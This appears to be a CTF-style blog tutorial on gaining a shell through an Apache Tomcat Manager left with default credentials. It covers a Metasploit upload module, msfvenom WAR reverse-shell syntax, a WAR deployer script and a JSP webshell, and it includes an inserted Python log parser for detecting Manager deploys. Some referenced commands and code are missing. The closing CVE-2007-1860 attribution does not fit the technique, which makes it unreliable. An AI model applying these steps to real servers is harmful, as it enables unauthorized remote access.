Multiple Ways to Exploit Tomcat Manager

Hello Friends, today through this article I would like to share my experience of how to exploit the Tomcat Manager application when it still has the default login credentials (tomcat:tomcat). While playing CTFs, I have often found Apache Tomcat running on the target machine configured with the default login, and this can help us get a shell on the remote machine. Therefore I felt I should write up all possible ways to exploit the Tomcat Manager application to gain a webshell on the remote machine.

Table of Content

  • Tomcat Manager Authenticated Upload Code Execution
  • Generate .war Format Backdoor
  • Tomcat War Deployer Script
  • Generate a JSP Webshell

Let’s start with an nmap scan to check whether port 8080 is running the Tomcat service.

From the nmap output, we found port 8080 open for Apache Tomcat. So we navigate to Target IP:port in a web browser, where we see the HTTP authentication page to log in to the Tomcat Manager application.

Tomcat Manager Authenticated Upload Code Execution

This module can be used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a JSP application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

As a result, you can observe that we have a meterpreter session on the target machine.

Generate .war Format Backdoor

We can use msfvenom to generate a .war format backdoor with a java/jsp payload. All you need to do is follow the syntax given below to create the .war file and then start a netcat listener.

Syntax: msfvenom -p [payload] LHOST=[Kali Linux IP] LPORT=[1234] -f [file format] > [file name]

Now log in to the Tomcat Manager application using tomcat:tomcat as username:password. You will be welcomed by the admin dashboard, where you can upload a .war file.

As you can observe, I browsed to the malicious shell.war file to be deployed, as highlighted in the image. As soon as you upload your file, you will see the /path entry for your file in the Applications table.

To execute your .war file, click on the /file_name path listed in the Applications table, or browse directly to http://target_IP:port/file_name.

As soon as you execute your file, you will get a reverse connection on netcat.

Boom!!! One more time we have access to a remote webshell.
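From the defender’s side, the upload described in the module section (a POST against /manager/html/upload) and the manual upload-then-click steps above leave a distinct trail in Tomcat’s access log: an authenticated deploy request, followed by the first requests ever served for a context path the same client then visits. The script below is an added example written for this article, not code from the original post or from Tomcat; it parses constructed lines in Tomcat’s default common log format and flags that sequence. The log lines, IP addresses and the /shell context are constructed sample data.

```python
import re
from datetime import datetime, timedelta

# Tomcat "common" access log pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')
# Manager endpoints that deploy a web application: the HTML form upload used
# in the article, and the text/script interface that deployer tools talk to.
DEPLOY_RE = re.compile(r'^/manager/(html/upload|text/deploy)(\?|$)')
SKIP = {'/manager', '/host-manager'}  # built-in contexts, never "new"

def parse(line):
    """Parse one access-log line into a dict (None if it does not match)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d['time'] = datetime.strptime(d['time'], '%d/%b/%Y:%H:%M:%S %z')
    d['context'] = '/' + d['path'].split('?', 1)[0].split('/')[1]
    return d

def find_manager_deploys(lines, window=timedelta(minutes=15)):
    """One alert per successful Manager deploy request. Each alert also lists
    context paths the same client hit for the first time within `window`
    afterwards: that is where a freshly uploaded WAR would be invoked."""
    known, alerts = set(), []
    for e in filter(None, map(parse, lines)):
        if DEPLOY_RE.match(e['path']) and e['status'] == '200':
            alerts.append({'host': e['host'], 'user': e['user'], 'time': e['time'],
                           'request': e['path'], 'new_contexts': []})
            continue
        if e['context'] not in known and e['context'] not in SKIP:
            for a in alerts:
                age = e['time'] - a['time']
                if a['host'] == e['host'] and timedelta(0) <= age <= window:
                    a['new_contexts'].append(e['context'])
        known.add(e['context'])
    return alerts

# Constructed sample log: a manager login, a WAR upload, and the first hit on
# the new /shell context from the same client; the /docs traffic is benign.
SAMPLE_LOG = """\
10.0.0.5 - tomcat [12/Mar/2018:10:15:02 +0000] "GET /manager/html HTTP/1.1" 200 19452
10.0.0.5 - tomcat [12/Mar/2018:10:15:40 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=0F3A HTTP/1.1" 200 20011
10.0.0.5 - - [12/Mar/2018:10:15:55 +0000] "GET /shell/ HTTP/1.1" 200 13
192.168.1.20 - - [12/Mar/2018:10:16:10 +0000] "GET /docs/index.html HTTP/1.1" 200 5122
10.0.0.5 - - [12/Mar/2018:10:16:30 +0000] "GET /docs/ HTTP/1.1" 200 5122
""".splitlines()
```

Running `find_manager_deploys(SAMPLE_LOG)` yields a single alert for the tomcat user from 10.0.0.5 with `/shell` as the only new context; the later /docs request is not flagged because another client had already been served that context.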

Tomcat War Deployer Script

This is a penetration testing tool intended to leverage Apache Tomcat credentials in order to automatically generate and deploy a JSP backdoor, as well as invoke it afterwards and provide a nice shell (either via a web GUI, a listening port bound on the remote machine, or a reverse TCP payload connecting back to the adversary).

In practice, it generates a JSP backdoor WAR package on the fly and deploys it to the Apache Tomcat Manager Application, using the valid HTTP Authentication credentials that the pentester provided (or custom ones; in the end, we all love tomcat:tomcat).

You can download it from here: https://github.com/mgeeky/tomcatWarDeployer

Now follow the syntax below to exploit the target machine without uploading the .war file manually.

Syntax: ./tomcatWarDeployer.py -U [username] -P [password] -H [Kali Linux IP] -p [listening port] [target_IP]:[tomcat_port]

On executing the above command, I got a webshell directly, as you can observe in the image below.

Generate a JSP Webshell

In this part, we are going to see how we can generate and deploy a webshell to gain command execution through the Tomcat Manager application.

First, we need to write the webshell and package it in .war format. To write the JSP webshell, we use the following code, which I found at this link: https://pentesterlab.com/exercises/cve-2007-1860/course

Save the code as index.jsp and then execute the following command to package it as a .war file.

With the help of the above command you get a war file, which you can deploy in the Tomcat Manager application.

As you can observe from the image below, I deployed my webshell.war file, which uploaded successfully; now let’s click on this file to execute it.

On opening /webshell you will get an HTTP 404 error; now request the index.jsp file inside it as given below:

On opening the above URL you will get a command execution form; now use it wisely to run commands.

Hopefully you have enjoyed this article on how to get access to the Tomcat Manager using CVE-2007-1860.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast.
